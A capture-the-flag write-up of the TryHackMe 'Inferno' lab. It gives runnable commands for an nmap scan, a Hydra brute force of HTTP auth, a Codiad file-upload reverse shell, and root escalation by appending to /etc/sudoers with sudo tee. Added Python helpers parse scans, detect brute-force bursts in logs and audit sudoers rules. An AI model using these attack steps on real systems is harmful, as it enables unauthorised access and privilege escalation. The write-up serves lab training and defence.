Inferno (OSCP practice + tee privesc)

TryHackMe — Inferno, Let's Do It!!

Hello guys! Today we are tackling the Inferno room from TryHackMe. Without further ado, let's get started! Enumeration starts…

We will start with an nmap scan.

export IP=10.10.148.13
nmap -sC -sV -T4 -oN nmap.txt $IP

And this throws a haunted output; looks like this time we will have even more fun.

21/tcp    open  ftp?              syn-ack ttl 63
22/tcp    open  ssh               syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d7:ec:1a:7f:62:74:da:29:64:b3:ce:1e:e2:68:04:f7 (RSA)
| ssh-rsa
|   256 de:4f:ee:fa:86:2e:fb:bd:4c:dc:f9:67:73:02:84:34 (ECDSA)
| ecdsa-sha2-nistp256
|   256 e2:6d:8d:e1:a8:d0:bd:97:cb:9a:bc:03:c3:f8:d8:85 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAdzynTIlsSkYKaqfCAdSx5J2nfdoWFw1FcpKFIF8LRv
23/tcp    open  telnet?           syn-ack ttl 63
25/tcp    open  smtp?             syn-ack ttl 63
|_smtp-commands: Couldn't establish connection on port 25
80/tcp    open  http              syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|   Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Dante's Inferno
88/tcp    open  kerberos-sec?     syn-ack ttl 63
106/tcp   open  pop3pw?           syn-ack ttl 63
110/tcp   open  pop3?             syn-ack ttl 63
389/tcp   open  ldap?             syn-ack ttl 63
443/tcp   open  https?            syn-ack ttl 63
464/tcp   open  kpasswd5?         syn-ack ttl 63
636/tcp   open  ldapssl?          syn-ack ttl 63
777/tcp   open  multiling-http?   syn-ack ttl 63
783/tcp   open  spamassassin?     syn-ack ttl 63
808/tcp   open  ccproxy-http?     syn-ack ttl 63
873/tcp   open  rsync?            syn-ack ttl 63
1001/tcp  open  webpush?          syn-ack ttl 63
1236/tcp  open  bvcontrol?        syn-ack ttl 63
1300/tcp  open  h323hostcallsc?   syn-ack ttl 63
2000/tcp  open  cisco-sccp?       syn-ack ttl 63
2003/tcp  open  finger?           syn-ack ttl 63
|_finger: ERROR: Script execution failed (use -d to debug)
2121/tcp  open  ccproxy-ftp?      syn-ack ttl 63
2601/tcp  open  zebra?            syn-ack ttl 63
2602/tcp  open  ripd?             syn-ack ttl 63
2604/tcp  open  ospfd?            syn-ack ttl 63
2605/tcp  open  bgpd?             syn-ack ttl 63
2607/tcp  open  connection?       syn-ack ttl 63
2608/tcp  open  wag-service?      syn-ack ttl 63
4224/tcp  open  xtell?            syn-ack ttl 63
5051/tcp  open  ida-agent?        syn-ack ttl 63
5432/tcp  open  postgresql?       syn-ack ttl 63
5555/tcp  open  freeciv?          syn-ack ttl 63
5666/tcp  open  nrpe?             syn-ack ttl 63
6346/tcp  open  gnutella?         syn-ack ttl 63
6566/tcp  open  sane-port?        syn-ack ttl 63
6667/tcp  open  irc?              syn-ack ttl 63
|_irc-info: Unable to open connection
8021/tcp  open  ftp-proxy?        syn-ack ttl 63
8081/tcp  open  blackice-icecap?  syn-ack ttl 63
|_mcafee-epo-agent: ePO Agent not found
8088/tcp  open  radan-http?       syn-ack ttl 63
9418/tcp  open  git?              syn-ack ttl 63
10000/tcp open  snet-sensor-mgmt? syn-ack ttl 63
10082/tcp open  amandaidx?        syn-ack ttl 63
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
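Most of that table carries a "?" after the service name, which is nmap's way of saying the version probe got no recognisable response and the label is only a guess from the port number. To make that actionable, here is an added Python helper (my own example, not part of the original write-up and not nmap's code) that parses nmap's normal output and separates confirmed services from ones that still need a manual look. The sample text is a constructed excerpt of the scan above, and the parser assumes the --reason column ("syn-ack ttl 63") sits between SERVICE and VERSION, as it does in this output.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Constructed sample in the shape of the nmap -oN output above (a handful of its lines,
# including the NSE script output that follows a port line).
SAMPLE_NMAP = """\
PORT      STATE SERVICE         REASON         VERSION
21/tcp    open  ftp?            syn-ack ttl 63
22/tcp    open  ssh             syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d7:ec:1a:7f:62:74:da:29:64:b3:ce:1e:e2:68:04:f7 (RSA)
80/tcp    open  http            syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Dante's Inferno
5432/tcp  open  postgresql?     syn-ack ttl 63
9418/tcp  open  git?            syn-ack ttl 63
"""


@dataclass
class PortEntry:
    port: int
    proto: str
    state: str
    service: str            # as nmap prints it; a trailing '?' means an unconfirmed guess
    version: str = ""       # empty when -sV got no recognisable banner
    scripts: List[str] = field(default_factory=list)

    @property
    def confirmed(self) -> bool:
        """True when -sV matched a fingerprint; nmap drops the '?' only then."""
        return not self.service.endswith("?")


PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# The --reason column ("syn-ack ttl 63") sits between SERVICE and VERSION; strip it if present.
REASON_RE = re.compile(r"^(?:syn-ack|ack|reset|no-response|conn-refused)(?:\s+ttl\s+\d+)?\s*")


def parse_nmap_normal(text: str) -> List[PortEntry]:
    """Parse the port table of an nmap normal-output (-oN) file."""
    entries: List[PortEntry] = []
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, rest = m.groups()
            version = REASON_RE.sub("", rest, count=1).strip()
            entries.append(PortEntry(int(port), proto, state, service, version))
        elif line.startswith("|") and entries:
            # NSE script lines ("| ssh-hostkey:", "|_http-title: ...") belong to the port above
            entries[-1].scripts.append(line.lstrip("|_ ").rstrip())
    return entries


def triage(text: str) -> dict:
    """Split open ports into confirmed services and ones that still need a manual look."""
    entries = parse_nmap_normal(text)
    return {
        "open_ports": len(entries),
        "confirmed": [e.port for e in entries if e.confirmed],
        "needs_manual_check": [e.port for e in entries if not e.confirmed],
    }


if __name__ == "__main__":
    for port in triage(SAMPLE_NMAP)["needs_manual_check"]:
        print(f"port {port}: service unconfirmed, verify by hand before trusting the label")
```

Run against the full nmap.txt, the "needs_manual_check" list is the set of ports where the service name should not be trusted; on this box that is nearly everything except 22 and 80, which is why the write-up goes straight to the web server.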

Now note the question marks on many ports: they mean nmap could not confirm what those ports are actually doing; in other words nmap isn't sure about the service and is only guessing from the port number. Let's start out with the web. Port 80 HTTP:

So this is how the index page looks. It contains some Latin strings and a traditional-style image, and the page source is useless too. — Move ON!! —

Let's start directory and file discovery. I used the following commands:

# For Directories :
ffuf -c -u http://10.10.148.13/FUZZ/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
# For Files :
ffuf -c -u http://10.10.148.13/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt

But this gives nothing, so I thought we need to “Try Harder”. Let's try a bigger wordlist. I used the following one:

ffuf -c -u http://10.10.148.13/FUZZ/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

and $ — — Bling Bling — — $ we got something: Cool!! we got a directory named /inferno/. So let's visit this directory and see what is roaming there. Ohh no!!!

😣Ohh!! this requires credentials…. we need admin creds?? Let's find that out now!!😤😤

I tried some common creds like [admin:admin, admin:password, root:root, root:toor] and some more like that… but we got 👎👎👎.

So let's use Hydra the Dragon now and burn out🔥🔥 this HTTP-auth login prompt.

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.148.13 http-get /inferno -t 64

This gives us the user:password pair.
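From the blue-team side a Hydra run like this is loud: every guess is a 401 against the same path from one client, and the moment the password lands that same client gets a single 2xx on it. The following added Python example (mine, not from the post) runs exactly that detection over Apache combined-format access-log lines; the log sample is constructed, so the IPs, timestamps and byte counts are made up.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Iterable, List

# Constructed Apache combined-log sample: one client hammering the protected /inferno/
# prompt, a normal visitor, one stray 401 from that visitor, then the attacker's first 200.
SAMPLE_LOG = """\
10.9.1.7 - - [11/Jan/2021:15:40:01 +0000] "GET /inferno/ HTTP/1.1" 401 459 "-" "Mozilla/4.0 (Hydra)"
10.9.1.7 - - [11/Jan/2021:15:40:01 +0000] "GET /inferno/ HTTP/1.1" 401 459 "-" "Mozilla/4.0 (Hydra)"
10.9.1.7 - - [11/Jan/2021:15:40:02 +0000] "GET /inferno/ HTTP/1.1" 401 459 "-" "Mozilla/4.0 (Hydra)"
10.9.2.3 - - [11/Jan/2021:15:40:02 +0000] "GET /index.html HTTP/1.1" 200 2143 "-" "Mozilla/5.0"
10.9.1.7 - - [11/Jan/2021:15:40:02 +0000] "GET /inferno/ HTTP/1.1" 401 459 "-" "Mozilla/4.0 (Hydra)"
10.9.1.7 - - [11/Jan/2021:15:40:03 +0000] "GET /inferno/ HTTP/1.1" 401 459 "-" "Mozilla/4.0 (Hydra)"
10.9.2.3 - - [11/Jan/2021:15:40:05 +0000] "GET /inferno/ HTTP/1.1" 401 459 "-" "Mozilla/5.0"
10.9.1.7 - - [11/Jan/2021:15:40:09 +0000] "GET /inferno/ HTTP/1.1" 401 459 "-" "Mozilla/4.0 (Hydra)"
10.9.1.7 - admin [11/Jan/2021:15:40:10 +0000] "GET /inferno/ HTTP/1.1" 200 1021 "-" "Mozilla/4.0 (Hydra)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line: str):
    """Return the fields we need from one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_auth_bruteforce(lines: Iterable[str], threshold: int = 20, window_s: int = 60) -> List[dict]:
    """Flag (client, path) pairs with >= threshold 401s inside a sliding window, and then
    the first 2xx the same client gets on that path, which is the 'password found' signal."""
    recent = defaultdict(deque)   # (ip, path) -> timestamps of recent 401s
    flagged = set()
    alerts: List[dict] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["ip"], rec["path"])
        if rec["status"] == 401:
            q = recent[key]
            q.append(rec["ts"])
            while (rec["ts"] - q[0]).total_seconds() > window_s:   # drop failures outside the window
                q.popleft()
            if len(q) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append({"kind": "auth-bruteforce", "ip": rec["ip"],
                               "path": rec["path"], "failures": len(q), "at": rec["ts"]})
        elif 200 <= rec["status"] < 300 and key in flagged:
            alerts.append({"kind": "success-after-bruteforce", "ip": rec["ip"],
                           "path": rec["path"], "user": rec["user"], "at": rec["ts"]})
            flagged.discard(key)   # one success alert per burst
    return alerts


if __name__ == "__main__":
    for alert in detect_auth_bruteforce(SAMPLE_LOG.splitlines(), threshold=5):
        print(alert)
```

The success-after-burst alert is the one worth paging on: a burst of 401s alone may be a misconfigured client, but a 2xx from the same source right after it means the guessing worked and the authenticated user in the log (here admin) should be treated as compromised. A threshold of 20 in 60 s is a reasonable starting point for Basic-auth endpoints; the sample uses 5 only so the constructed log stays short.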

Now we have creds. Supply the creds and get in….

But we need to log in again; I used the same creds and this worked!!👍👍 We are totally in now.

Now we are finally inside the admin panel. Here I noticed something…. Did you???🤨🤨🤨

If we look, this website's title is “Codiad”. Oh yes.

I have already exploited this service earlier. Let's use searchsploit to find any offline exploit available for it on our system.

searchsploit codiad

Ohuuuhhaa!! this is the thing we are looking for!! I am going to use the last one, so let's copy it to the present working directory.

searchsploit -m multiple/webapps/50474.txt

After reading the exploit I clearly understand that this site is vulnerable to a “file-upload” vulnerability. So let's abuse this weakness and get a shell on the target system🐚🐚.

As recommended, let's visit /inferno/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/.

Here, right-click the /INF/ directory and click the “Upload Files” option.

Now click “Drag Files Or Click Here To Upload” and upload your reverse shell…

I used php-reverse-shell.php by pentestmonkey, edited to point at my listener; you can find it here.📌📌📌

Now set up a listener👂 and let's provoke the reverse shell. To do this, simply visit the reverse shell's location.

and we will get a reverse connection on our listener👂.

Now it's time to enumerate more and find the way to root. I started with the user dante's home directory and found something which seemed weird to me, in the /home/dante/Downloads/ directory:

drwxr-xr-x  2 root  root     4096 Jan 11 15:29 .
drwxr-xr-x 13 dante dante    4096 Jan 11 15:46 ..
-rw-r--r--  1 root  root     1511 Nov  3 11:52 .download.dat   <<<<<--
-rwxr-xr-x  1 root  root   137440 Jan 11 15:29 CantoI.docx
-rwxr-xr-x  1 root  root   141528 Jan 11 15:29 CantoII.docx
-rwxr-xr-x  1 root  root    88280 Jan 11 15:29 CantoIII.docx
-rwxr-xr-x  1 root  root    63704 Jan 11 15:29 CantoIV.docx
-rwxr-xr-x  1 root  root   133792 Jan 11 15:29 CantoIX.docx
-rwxr-xr-x  1 root  root    43224 Jan 11 15:22 CantoV.docx
-rwxr-xr-x  1 root  root   133792 Jan 11 15:29 CantoVI.docx
-rwxr-xr-x  1 root  root   141528 Jan 11 15:29 CantoVII.docx
-rwxr-xr-x  1 root  root    63704 Jan 11 15:29 CantoX.docx
-rwxr-xr-x  1 root  root   121432 Jan 11 15:29 CantoXI.docx
-rwxr-xr-x  1 root  root   149080 Jan 11 15:22 CantoXII.docx
-rwxr-xr-x  1 root  root   216256 Jan 11 15:22 CantoXIII.docx
-rwxr-xr-x  1 root  root   141528 Jan 11 15:29 CantoXIV.docx
-rwxr-xr-x  1 root  root   141528 Jan 11 15:29 CantoXIX.docx
-rwxr-xr-x  1 root  root    88280 Jan 11 15:29 CantoXV.docx
-rwxr-xr-x  1 root  root   137440 Jan 11 15:29 CantoXVI.docx
-rwxr-xr-x  1 root  root   121432 Jan 11 15:29 CantoXVII.docx
-rwxr-xr-x  1 root  root  2351792 Jan 11 15:22 CantoXVIII.docx
-rwxr-xr-x  1 root  root    63704 Jan 11 15:29 CantoXX.docx

Note the .download.dat file. If you simply cat it out, it gives some hex-encoded strings.

So let's decode it and see where this encoded data leads:

Boom!!💥💥 we got Dante's creds. Let's use SSH and get inside this system with a nice TTY.

Whenever we have a real user, the first thing we should check is the sudo rights. So let's check this now::: I used Dr. GTFOBins for this operation. This is the end!!

Here we can run tee as root with no password. So let's abuse it::

File=/etc/sudoers

echo "dante ALL=(ALL:ALL) ALL" | sudo tee -a "$File"

sudo -l

sudo sh
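The post does not show the sudo -l output itself, so as an added example (my own code, not from the write-up) here is a small audit that reads either sudoers-format rules or sudo -l output and flags exactly this kind of entry: a NOPASSWD rule for a binary that, like tee, can write arbitrary files as root. The sudoers text and the sudo -l transcript below are constructed samples, and FILE_WRITE_OR_SHELL is an illustrative subset that an administrator would extend from GTFOBins.

```python
import re
from typing import List

# Illustrative subset of binaries whose sudo rights amount to an arbitrary file write or a
# shell as the run-as user; an auditor would extend this from GTFOBins (assumption: not exhaustive).
FILE_WRITE_OR_SHELL = {"tee", "cp", "mv", "dd", "vim", "vi", "nano", "less", "find", "awk",
                       "python3", "bash", "sh"}

# Constructed sudoers sample, not the room's real /etc/sudoers.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
dante   ALL=(root) NOPASSWD: /usr/bin/tee
backup  ALL=(root) /usr/bin/rsync, NOPASSWD: /bin/systemctl restart nginx
"""

# Constructed `sudo -l` output in the shape sudo prints it (the post does not show the real one).
SAMPLE_SUDO_L = """\
Matching Defaults entries for dante on inferno:
    env_reset, mail_badpass
User dante may run the following commands on inferno:
    (root) NOPASSWD: /usr/bin/tee
"""

RULE_RE = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+)$")
SUDO_L_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<spec>.+)$")
TAG_RE = re.compile(r"^((?:[A-Z]+:\s*)+)")


def split_spec(spec: str):
    """Turn 'NOPASSWD: /a, /b' into [(tags, '/a'), (tags, '/b')]. As in sudoers(5), a tag
    stays in force for later commands in the list until PASSWD:/another tag overrides it."""
    out, tags = [], set()
    for part in spec.split(","):
        part = part.strip()
        m = TAG_RE.match(part)
        if m:
            for tag in filter(None, (t.strip() for t in m.group(1).split(":"))):
                if tag == "PASSWD":
                    tags.discard("NOPASSWD")
                elif tag == "NOPASSWD":
                    tags.discard("PASSWD")
                tags.add(tag)
            part = part[m.end():].strip()
        out.append((frozenset(tags), part))
    return out


def classify(command: str):
    """Risk label for one command spec, or None when it looks harmless."""
    if command == "ALL":
        return "unrestricted"
    name = command.split()[0].rsplit("/", 1)[-1]
    return "file-write-or-shell" if name in FILE_WRITE_OR_SHELL else None


def _finding(user, runas, tags, command):
    risk = classify(command)
    if risk is None:
        return None
    return {"user": user, "runas": runas or "root", "command": command,
            "nopasswd": "NOPASSWD" in tags, "risk": risk}


def audit_sudoers(text: str) -> List[dict]:
    """Flag risky rules in sudoers-format text (comments, Defaults and alias lines are skipped)."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults") or "_Alias" in line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for tags, command in split_spec(m.group("spec")):
            f = _finding(m.group("who"), m.group("runas"), tags, command)
            if f:
                findings.append(f)
    return findings


def audit_sudo_l(user: str, text: str) -> List[dict]:
    """Same check over `sudo -l` output, whose entries look like '(runas) [TAGS:] command'."""
    findings = []
    for raw in text.splitlines():
        m = SUDO_L_RE.match(raw)
        if not m:
            continue
        for tags, command in split_spec(m.group("spec")):
            f = _finding(user, m.group("runas"), tags, command)
            if f:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS) + audit_sudo_l("dante", SAMPLE_SUDO_L):
        print(f)
```

In sudoers a command listed with arguments ("/usr/bin/tee -a /var/log/app.log") only matches that exact argument list, which is the usual fix when a job genuinely needs tee as root; and the line the post appends to /etc/sudoers is precisely what a file-integrity check or an auditd watch on that file would report.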
